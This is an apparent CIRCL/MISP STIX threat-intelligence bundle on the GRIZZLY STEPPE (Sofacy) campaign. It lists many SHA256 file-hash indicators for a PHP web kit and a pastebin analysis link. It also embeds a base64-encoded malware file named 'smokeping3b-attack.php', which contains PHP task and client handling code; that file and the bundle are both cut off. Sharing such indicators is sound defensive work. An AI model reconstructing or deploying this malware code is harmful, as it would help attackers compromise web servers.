{
"type": "bundle",
|
|
|
|
"id": "bundle--5867a9dc-dde8-4877-b46f-42cc950d210f",
|
|
|
|
"objects": [
|
|
|
|
{
|
|
|
|
"type": "identity",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2017-01-02T15:37:44.000Z",
|
|
|
|
"modified": "2017-01-02T15:37:44.000Z",
|
|
|
|
"name": "CIRCL",
|
|
|
|
"identity_class": "organization"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "report",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "report--5867a9dc-dde8-4877-b46f-42cc950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2017-01-02T15:37:44.000Z",
|
|
|
|
"modified": "2017-01-02T15:37:44.000Z",
|
|
|
|
"name": "OSINT - GRIZZLY STEPPE \u2013 Additional expansion",
|
|
|
|
"published": "2017-01-03T10:07:48Z",
|
|
|
|
"object_refs": [
|
|
|
|
"observed-data--586a7423-3470-4ce5-a56d-1239538826be",
|
|
|
|
"file--586a7423-3470-4ce5-a56d-1239538826be",
|
|
|
|
"artifact--586a7423-3470-4ce5-a56d-1239538826be",
|
|
|
|
"observed-data--5867a9ea-679c-4cc7-b729-4e9f950d210f",
|
|
|
|
"url--5867a9ea-679c-4cc7-b729-4e9f950d210f",
|
|
|
|
"indicator--5867aabb-08e0-4ff3-8987-4c28950d210f",
|
|
|
|
"indicator--5867aabb-51b4-4423-b360-44bc950d210f",
|
|
|
|
"indicator--5867aabc-3e7c-4dfa-8c70-40ce950d210f",
|
|
|
|
"indicator--5867aabd-2bc4-40e4-abd2-4574950d210f",
|
|
|
|
"indicator--5867aabe-05f8-4f84-b473-462d950d210f",
|
|
|
|
"indicator--5867aabf-09e4-4bde-ba43-46e2950d210f",
|
|
|
|
"indicator--5867aabf-1cc8-4337-9149-4cda950d210f",
|
|
|
|
"indicator--5867aac0-292c-445a-9f0d-419c950d210f",
|
|
|
|
"indicator--5867aac1-e534-40a9-8f8f-494a950d210f",
|
|
|
|
"indicator--5867aac1-921c-4a4f-a662-40c0950d210f",
|
|
|
|
"indicator--5867aac2-f4a0-4d76-8691-48ee950d210f",
|
|
|
|
"indicator--5867aac2-ed84-4af7-acad-4b2a950d210f",
|
|
|
|
"indicator--5867aac3-6e80-433a-91b3-4f15950d210f",
|
|
|
|
"indicator--5867aac4-9b2c-41cd-b2b0-4222950d210f",
|
|
|
|
"indicator--5867aac4-1264-42fd-859e-4841950d210f",
|
|
|
|
"indicator--5867aac5-1b88-42ae-805d-40a4950d210f",
|
|
|
|
"indicator--5867aac6-f56c-4213-b3f8-4585950d210f",
|
|
|
|
"indicator--5867aac6-f834-4883-86bf-49f4950d210f",
|
|
|
|
"indicator--5867aac7-95c0-462e-bc38-47f3950d210f",
|
|
|
|
"indicator--5867aaef-e408-43a9-a5c6-4bb0950d210f",
|
|
|
|
"indicator--5867aaef-416c-45e6-9f42-49be950d210f",
|
|
|
|
"observed-data--5867ab00-a5fc-4109-95e5-477a950d210f",
|
|
|
|
"url--5867ab00-a5fc-4109-95e5-477a950d210f",
|
|
|
|
"indicator--5867ab3e-d314-452e-9571-437202de0b81",
|
|
|
|
"indicator--5867ab3e-201c-47d1-8679-463a02de0b81",
|
|
|
|
"observed-data--5867ab3f-5450-4736-9af6-466902de0b81",
|
|
|
|
"url--5867ab3f-5450-4736-9af6-466902de0b81",
|
|
|
|
"indicator--5867ab40-b8e0-43b2-a07a-4c9902de0b81",
|
|
|
|
"indicator--5867ab40-df2c-4b8b-a450-42a702de0b81",
|
|
|
|
"observed-data--5867ab41-ef38-4409-a401-434502de0b81",
|
|
|
|
"url--5867ab41-ef38-4409-a401-434502de0b81",
|
|
|
|
"indicator--5867ab41-18ec-4589-8c03-468e02de0b81",
|
|
|
|
"indicator--5867ab42-0f20-42e5-b3a1-45d702de0b81",
|
|
|
|
"observed-data--5867ab43-eca4-4951-86b7-4b6b02de0b81",
|
|
|
|
"url--5867ab43-eca4-4951-86b7-4b6b02de0b81",
|
|
|
|
"indicator--5867ab43-6134-4a87-8706-4c8702de0b81",
|
|
|
|
"indicator--5867ab44-3338-4e84-ac8c-454102de0b81",
|
|
|
|
"observed-data--5867ab44-0f7c-4a97-af10-4c3702de0b81",
|
|
|
|
"url--5867ab44-0f7c-4a97-af10-4c3702de0b81",
|
|
|
|
"indicator--5867ab45-c924-4de1-b9ab-467c02de0b81",
|
|
|
|
"indicator--5867ab46-dc58-4709-8ae0-4d1402de0b81",
|
|
|
|
"observed-data--5867ab46-ba50-4053-81bc-4c3f02de0b81",
|
|
|
|
"url--5867ab46-ba50-4053-81bc-4c3f02de0b81",
|
|
|
|
"indicator--5867ab47-d8ec-4ab6-b28d-46e002de0b81",
|
|
|
|
"indicator--5867ab47-d048-4e88-bf6a-4e7d02de0b81",
|
|
|
|
"observed-data--5867ab48-a968-445a-ba1b-465b02de0b81",
|
|
|
|
"url--5867ab48-a968-445a-ba1b-465b02de0b81",
|
|
|
|
"indicator--5867ab49-2f70-477a-80b0-4bee02de0b81",
|
|
|
|
"indicator--5867ab49-3744-422a-a88d-4a9c02de0b81",
|
|
|
|
"observed-data--5867ab4a-4bd8-46c6-aa14-427502de0b81",
|
|
|
|
"url--5867ab4a-4bd8-46c6-aa14-427502de0b81",
|
|
|
|
"indicator--5867ab4a-c524-42b3-8c3b-428402de0b81",
|
|
|
|
"indicator--5867ab4b-a970-41e0-9852-4ecb02de0b81",
|
|
|
|
"observed-data--5867ab4b-a214-4922-a374-41ce02de0b81",
|
|
|
|
"url--5867ab4b-a214-4922-a374-41ce02de0b81",
|
|
|
|
"indicator--5867ab4c-a6a4-4421-86a1-481602de0b81",
|
|
|
|
"indicator--5867ab4d-83e0-4c70-a4ee-455602de0b81",
|
|
|
|
"observed-data--5867ab4d-09a0-46be-90b6-42d102de0b81",
|
|
|
|
"url--5867ab4d-09a0-46be-90b6-42d102de0b81",
|
|
|
|
"indicator--5867ab4e-0a04-45cb-972a-44e502de0b81",
|
|
|
|
"indicator--5867ab4f-b268-4b7d-a305-406302de0b81",
|
|
|
|
"observed-data--5867ab4f-b148-40b8-9d4a-405f02de0b81",
|
|
|
|
"url--5867ab4f-b148-40b8-9d4a-405f02de0b81",
|
|
|
|
"indicator--5867ab50-0eac-468d-aadb-44a902de0b81",
|
|
|
|
"indicator--5867ab50-8ac4-419f-ae00-414302de0b81",
|
|
|
|
"observed-data--5867ab51-0a10-44bf-91f0-460d02de0b81",
|
|
|
|
"url--5867ab51-0a10-44bf-91f0-460d02de0b81",
|
|
|
|
"indicator--5867ab52-f1f4-4003-afe1-409502de0b81",
|
|
|
|
"indicator--5867ab52-5264-4faf-9aa1-4ba302de0b81",
|
|
|
|
"observed-data--5867ab53-47cc-41f0-b7e5-4c5102de0b81",
|
|
|
|
"url--5867ab53-47cc-41f0-b7e5-4c5102de0b81",
|
|
|
|
"indicator--5867ab53-cfd4-4844-a83c-4da102de0b81",
|
|
|
|
"indicator--5867ab54-f570-4e06-9e43-45dd02de0b81",
|
|
|
|
"observed-data--5867ab54-f590-4254-97dc-47bd02de0b81",
|
|
|
|
"url--5867ab54-f590-4254-97dc-47bd02de0b81",
|
|
|
|
"indicator--5867ab55-4468-4e85-be37-454c02de0b81",
|
|
|
|
"indicator--5867ab56-85dc-46b2-8b29-4e4b02de0b81",
|
|
|
|
"observed-data--5867ab56-44c4-4de0-8352-4a1f02de0b81",
|
|
|
|
"url--5867ab56-44c4-4de0-8352-4a1f02de0b81",
|
|
|
|
"indicator--5867ab57-8950-4855-8d5e-46c002de0b81",
|
|
|
|
"indicator--5867ab58-6ec4-48e7-8cf6-4eb602de0b81",
|
|
|
|
"observed-data--5867ab58-6044-4572-8efe-4fea02de0b81",
|
|
|
|
"url--5867ab58-6044-4572-8efe-4fea02de0b81",
|
|
|
|
"indicator--5867ab59-2814-4089-a276-4a7102de0b81",
|
|
|
|
"indicator--5867ab5a-12f8-4159-b3bd-405602de0b81",
|
|
|
|
"observed-data--5867ab5b-ff04-4404-8841-4d9c02de0b81",
|
|
|
|
"url--5867ab5b-ff04-4404-8841-4d9c02de0b81",
|
|
|
|
"indicator--5867ab5b-1274-4245-b71a-46d502de0b81",
|
|
|
|
"indicator--5867ab5c-c818-4db9-84a5-4ce402de0b81",
|
|
|
|
"observed-data--5867ab5c-0194-421b-b029-41ac02de0b81",
|
|
|
|
"url--5867ab5c-0194-421b-b029-41ac02de0b81",
|
|
|
|
"indicator--5867ab5d-e71c-4547-ad36-4ef002de0b81",
|
|
|
|
"indicator--5867ab5e-dbdc-45e2-aa3e-4f9a02de0b81",
|
|
|
|
"observed-data--5867ab5e-88ac-476b-89cc-4e2702de0b81",
|
|
|
|
"url--5867ab5e-88ac-476b-89cc-4e2702de0b81",
|
|
|
|
"indicator--5867ab5f-5434-40c4-90b3-405c02de0b81",
|
|
|
|
"indicator--5867ab60-d440-410f-a9c4-4db102de0b81",
|
|
|
|
"observed-data--5867ab60-be3c-4cdc-88aa-499c02de0b81",
|
|
|
|
"url--5867ab60-be3c-4cdc-88aa-499c02de0b81",
|
|
|
|
"indicator--5867ab61-03c0-4aa4-b522-4bb802de0b81",
|
|
|
|
"indicator--5867ab62-6f68-4447-9007-4f3a02de0b81",
|
|
|
|
"observed-data--5867ab62-efd4-45e1-b6c2-44fd02de0b81",
|
|
|
|
"url--5867ab62-efd4-45e1-b6c2-44fd02de0b81",
|
|
|
|
"indicator--5867ab63-cc40-4146-9b84-4d8e02de0b81",
|
|
|
|
"indicator--5867ab63-37b4-4e0a-9066-40c002de0b81",
|
|
|
|
"observed-data--5867ab64-2004-4d85-8222-4e5302de0b81",
|
|
|
|
"url--5867ab64-2004-4d85-8222-4e5302de0b81",
|
|
|
|
"observed-data--5867ab98-aeb0-40b7-97d2-4400950d210f",
|
|
|
|
"url--5867ab98-aeb0-40b7-97d2-4400950d210f",
|
|
|
|
"indicator--5867abaf-a80c-4ef4-87d0-4427950d210f",
|
|
|
|
"indicator--5867abc3-674c-47d9-8082-4d44950d210f",
|
|
|
|
"indicator--5867abd5-2b98-4087-9c66-4a70950d210f",
|
|
|
|
"observed-data--5867ac24-76c0-48b5-829b-4f0e950d210f",
|
|
|
|
"file--5867ac24-76c0-48b5-829b-4f0e950d210f",
|
|
|
|
"artifact--5867ac24-76c0-48b5-829b-4f0e950d210f",
|
|
|
|
"indicator--586b5278-1c38-4615-8db5-46e3950d210f",
|
|
|
|
"indicator--586b527a-c690-4f5a-a7b5-4a1e950d210f",
|
|
|
|
"indicator--586b527b-fb50-4977-9f99-4584950d210f"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"Threat-Report",
|
|
|
|
"misp:tool=\"MISP-STIX-Converter\"",
|
|
|
|
"misp-galaxy:threat-actor=\"Sofacy\"",
|
|
|
|
"circl:incident-classification=\"malware\"",
|
|
|
|
"ecsirt:malicious-code=\"malware\""
|
|
|
|
],
|
|
|
|
"object_marking_refs": [
|
|
|
|
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--586a7423-3470-4ce5-a56d-1239538826be",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2017-01-02T15:39:15.000Z",
|
|
|
|
"modified": "2017-01-02T15:39:15.000Z",
|
|
|
|
"first_observed": "2017-01-02T15:39:15Z",
|
|
|
|
"last_observed": "2017-01-02T15:39:15Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"file--586a7423-3470-4ce5-a56d-1239538826be",
|
|
|
|
"artifact--586a7423-3470-4ce5-a56d-1239538826be"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"attachment\"",
|
|
|
|
"misp:category=\"Payload delivery\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "file",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "file--586a7423-3470-4ce5-a56d-1239538826be",
|
|
|
|
"name": "smokeping3b-attack.php",
|
|
|
|
"content_ref": "artifact--586a7423-3470-4ce5-a56d-1239538826be"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "artifact",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "artifact--586a7423-3470-4ce5-a56d-1239538826be",
|
|
|
|
"payload_bin": "ICAgZGVmaW5lKCdNQUlOX0RJUicsICcuL2NvbmZpbmUvQ29ubmVjdGl2aXR5L0RldXRzY2hsYW5kLycpOwogZGVmaW5lKCdUQVNLU19ESVInLCAnLi9jb25maW5lL0Nvbm5lY3Rpdml0eS9EZXV0c2NobGFuZC9Jbm9kZS8nKTsKIGRlZmluZSgnRklMRVNfRElSJywgJy4vY29uZmluZS9Db25uZWN0aXZpdHkvRGV1dHNjaGxhbmQvTmVzc3VzLycpOwogZGVmaW5lKCdQQVNTJywgJzhiNmY5N2JkM2NkOWM4YzQyZjFlZTU4Mjc4Yjg0MmZlJyk7CiBkZWZpbmUoJ01BSU5fRklMRV9OQU1FJywgJ0RldXRzY2hsYW5kLnBuZycpOwogZGVmaW5lKCdGSUxFU19FWFRFTlNJT04nLCAnLnBuZycpOwogIGRlZmluZSgnTUFJTl9GSUxFX1BBVEgnLCBNQUlOX0RJUiAuIE1BSU5fRklMRV9OQU1FKTsKICAgZXJyb3JfcmVwb3J0aW5nKDApOwogICBjbGFzcyBUYXNrIHsKICAJdmFyICR0YXNrX2lkOwogCXZhciAkdGFza19kYXRhOwogCXZhciAkY3JlYXRlZF9hdDsKIAl2YXIgJGFuc3dlcl9kYXRhOwogCXZhciAkY3VycmVudF9jaHVuazsKIAl2YXIgJHRvdGFsX2NodW5rczsKIAl2YXIgJGNvbXBsZXRlZDsKICAJZnVuY3Rpb24gX19jb25zdHJ1Y3QoJHRhc2tfdXVpZCkgewogCQkkdGhpcy0+c2V0X2RhdGEoJycpOwogCQkkdGhpcy0+dGFza19pZCA9ICR0YXNrX3V1aWQ7CiAJCSR0aGlzLT5jdXJyZW50X2NodW5rID0gMDsKIAkJJHRoaXMtPnRvdGFsX2NodW5rcyA9IDA7CiAJfQogIAlmdW5jdGlvbiBfX3NsZWVwKCkgewogIAkJaWYgKCEkdGhpcy0+dGFza19kYXRhICYmICEkdGhpcy0+YW5zd2VyX2RhdGEpIHsKIAkJCXJldHVybjsKIAkJfQogIAkJJGZpbGVuYW1lID0gVEFTS1NfRElSLiR0aGlzLT50YXNrX2lkLkZJTEVTX0VYVEVOU0lPTjsKIAkJJGRhdGFbJ3Rhc2tfZGF0YSddID0gJHRoaXMtPnRhc2tfZGF0YTsKIAkJJGRhdGFbJ2Fuc3dlcl9kYXRhJ10gPSAkdGhpcy0+YW5zd2VyX2RhdGE7CiAJCSRkYXRhWydjdXJyZW50X2NodW5rJ10gPSAkdGhpcy0+Y3VycmVudF9jaHVuazsKIAkJJGRhdGFbJ3RvdGFsX2NodW5rcyddID0gJHRoaXMtPnRvdGFsX2NodW5rczsKIAkJZmlsZV9wdXRfY29udGVudHMoJGZpbGVuYW1lLCBzZXJpYWxpemUoJGRhdGEpKTsKIAkJcmV0dXJuIGFycmF5KCd0YXNrX2lkJywgJ2NyZWF0ZWRfYXQnLCAnY29tcGxldGVkJyk7CiAJfQogIAlmdW5jdGlvbiBfX3dha2V1cCgpIHsKIAkJJGZpbGVuYW1lID0gVEFTS1NfRElSLiR0aGlzLT50YXNrX2lkLkZJTEVTX0VYVEVOU0lPTjsKIAkJaWYgKGZpbGVfZXhpc3RzKCRmaWxlbmFtZSkpIHsKIAkJCSRkYXRhID0gdW5zZXJpYWxpemUoZmlsZV9nZXRfY29udGVudHMoJGZpbGVuYW1lKSk7CiAJCQkkdGhpcy0+dGFza19kYXRhID0gJGRhdGFbJ3Rhc2tfZGF0YSddOwogCQkJJHRoaXMtPmFuc3dlcl9kYXRhID0gJGRhdGFbJ2Fuc3dlcl9kYXRhJ107CiAJCQkkdGhpcy0+Y3VycmVudF9jaHVuayA9ICRkYXRhWydjdXJyZW50X2NodW5rJ107CiAJCQkkdGhpcy0+dG90
YWxfY2h1bmtzID0gJGRhdGFbJ3RvdGFsX2NodW5rcyddOwogCQl9CiAJfQogIAlmdW5jdGlvbiBfX3RvU3RyaW5nKCkgewogCQlyZXR1cm4gJHRoaXMtPnRhc2tfaWQ7CiAJfQogIAlwdWJsaWMgZnVuY3Rpb24gaXNfY29tcGxldGVkKCkgewogCQlyZXR1cm4gJHRoaXMtPmNvbXBsZXRlZDsKIAl9CiAgCXB1YmxpYyBmdW5jdGlvbiBzZXRfZGF0YSgkZGF0YSkgewogCQkkdGhpcy0+dGFza19kYXRhID0gJGRhdGE7CiAJCSR0aGlzLT5jcmVhdGVkX2F0ID0gdGltZSgpOwogCQkkdGhpcy0+YW5zd2VyX2RhdGEgPSBhcnJheSgpOwogCQkkdGhpcy0+Y29tcGxldGVkID0gZmFsc2U7CiAJCXJldHVybiAkdGhpcy0+dGFza19pZDsKIAl9CiAgCXB1YmxpYyBmdW5jdGlvbiBhcHBlbmRfYW5zd2VyKCRkYXRhLCAkY3VycmVudF9jaHVuaywgJHRvdGFsX2NodW5rcykgewogCQkkdGhpcy0+Y3VycmVudF9jaHVuayA9ICRjdXJyZW50X2NodW5rICsgMTsKIAkJJHRoaXMtPnRvdGFsX2NodW5rcyA9ICR0b3RhbF9jaHVua3M7CiAJCSR0aGlzLT5hbnN3ZXJfZGF0YVskY3VycmVudF9jaHVua10gPSAkZGF0YTsKIAl9CiAgfQogIGNsYXNzIENsaWVudCB7CiAgCXZhciAkdXVpZDsKIAl2YXIgJGNyZWF0ZWRfYXQ7CiAJdmFyICRsYXN0OwogCXZhciAkdGFza3M7CiAgCWZ1bmN0aW9uIF9fY29uc3RydWN0KCR1dWlkKSB7CiAJCSR0aGlzLT51dWlkID0gJHV1aWQ7CiAJCSR0aGlzLT5jcmVhdGVkX2F0ID0gdGltZSgpOwogCQkkdGhpcy0+cHJldl9sYXN0ID0gdGltZSgpOwogCQkkdGhpcy0+bGFzdCA9IHRpbWUoKTsKIAkJJHRoaXMtPnRhc2tzID0gYXJyYXkoKTsKIAl9CiAgCWZ1bmN0aW9uIF9fc2xlZXAoKSB7CiAgCQlyZXR1cm4gYXJyYXkoJ3V1aWQnLCAnY3JlYXRlZF9hdCcsICdwcmV2X2xhc3QnLCAnbGFzdCcsICd0YXNrcycpOwogCX0KICAJZnVuY3Rpb24gX193YWtldXAoKSB7CiAJCSR0aGlzLT50YXNrcyA9IGFycmF5X3ZhbHVlcygkdGhpcy0+dGFza3MpOwogIAl9CiAgCXB1YmxpYyBmdW5jdGlvbiBzZWFyY2hfdGFzaygkdGFza19pZCkgewogCQlmb3JlYWNoICgkdGhpcy0+dGFza3MgYXMgJHRhc2spIHsKIAkJCWlmICgkdGFzay0+dGFza19pZCA9PSAkdGFza19pZCkgewogCQkJCXJldHVybiAkdGFzazsKIAkJCX0KIAkJfQogCQlyZXR1cm4gZmFsc2U7CiAJfQogIAlwdWJsaWMgZnVuY3Rpb24gdXVpZCgpIHsKIAkJcmV0dXJuICR0aGlzLT51dWlkOwogCX0KICAJcHVibGljIGZ1bmN0aW9uIHBpbmcoKSB7CiAJCSR0aGlzLT5wcmV2X2xhc3QgPSAkdGhpcy0+bGFzdDsKIAkJJHRoaXMtPmxhc3QgPSB0aW1lKCk7CiAJCSR0YXNrc190b193b3JrID0gYXJyYXkoKTsKIAkJZm9yZWFjaCgkdGhpcy0+dGFza3MgYXMgJHRhc2spIHsKIAkJCWlmKCR0YXNrICYmICEkdGFzay0+aXNfY29tcGxldGVkKCkpIHsKIAkJCQlhcnJheV9wdXNoKCR0YXNrc190b193b3JrLCBhcnJheSgndGFza19pZCcgPT4gJHRhc2stPnRhc2tfaWQsICd0YXNrX2RhdGEnID0+ICR0
YXNrLT50YXNrX2RhdGEpKTsKIAkJCX0KIAkJfQogCQlyZXR1cm4gYXJyYXkoJ3Rhc2tzJyA9PiAkdGFza3N
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--5867a9ea-679c-4cc7-b729-4e9f950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:51:54.000Z",
|
|
|
|
"modified": "2016-12-31T12:51:54.000Z",
|
|
|
|
"first_observed": "2016-12-31T12:51:54Z",
|
|
|
|
"last_observed": "2016-12-31T12:51:54Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--5867a9ea-679c-4cc7-b729-4e9f950d210f"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--5867a9ea-679c-4cc7-b729-4e9f950d210f",
|
|
|
|
"value": "http://pastebin.com/raw/gxq0FMsU"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aabb-08e0-4ff3-8987-4c28950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:55:23.000Z",
|
|
|
|
"modified": "2016-12-31T12:55:23.000Z",
|
|
|
|
"description": "GRIZZLY_STEPPE_Malware_2",
|
|
|
|
"pattern": "[file:hashes.SHA256 = '55058d3427ce932d8efcbe54dccf97c9a8d1e85c767814e34f4b2b6a6b305641']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:55:23Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aabb-51b4-4423-b360-44bc950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:55:23.000Z",
|
|
|
|
"modified": "2016-12-31T12:55:23.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod",
|
|
|
|
"pattern": "[file:hashes.SHA256 = '3367623638d42bdc1c45c44cb1843c00b510814170bc4e5da61eba2ddb212672']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:55:23Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aabc-3e7c-4dfa-8c70-40ce950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:55:24.000Z",
|
|
|
|
"modified": "2016-12-31T12:55:24.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod",
|
|
|
|
"pattern": "[file:hashes.SHA256 = 'da9f2804b16b369156e1b629ad3d2aac79326b94284e43c7b8355f3db71912b8']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:55:24Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aabd-2bc4-40e4-abd2-4574950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:55:25.000Z",
|
|
|
|
"modified": "2016-12-31T12:55:25.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod",
|
|
|
|
"pattern": "[file:hashes.SHA256 = '972866536f195079071d23b9f8ec90eb32ae3aa493d8cdf5ad34b85dec1a0775']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:55:25Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aabe-05f8-4f84-b473-462d950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:55:26.000Z",
|
|
|
|
"modified": "2016-12-31T12:55:26.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod",
|
|
|
|
"pattern": "[file:hashes.SHA256 = 'd285115e97c02063836f1cf8f91669c114052727c39bf4bd3c062ad5b3509e38']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:55:26Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aabf-09e4-4bde-ba43-46e2950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:55:27.000Z",
|
|
|
|
"modified": "2016-12-31T12:55:27.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod",
|
|
|
|
"pattern": "[file:hashes.SHA256 = '1025f33ff026495d7f7fdb527e127e2b7780d9d28cb1e7912a9be84f38ba858e']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:55:27Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aabf-1cc8-4337-9149-4cda950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:55:27.000Z",
|
|
|
|
"modified": "2016-12-31T12:55:27.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod",
|
|
|
|
"pattern": "[file:hashes.SHA256 = 'b8313a966f93f773b031d386afe56792fe1edb0ffd1bc07a9ae72cec48e0d6f1']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:55:27Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aac0-292c-445a-9f0d-419c950d210f",
|
|
|
|
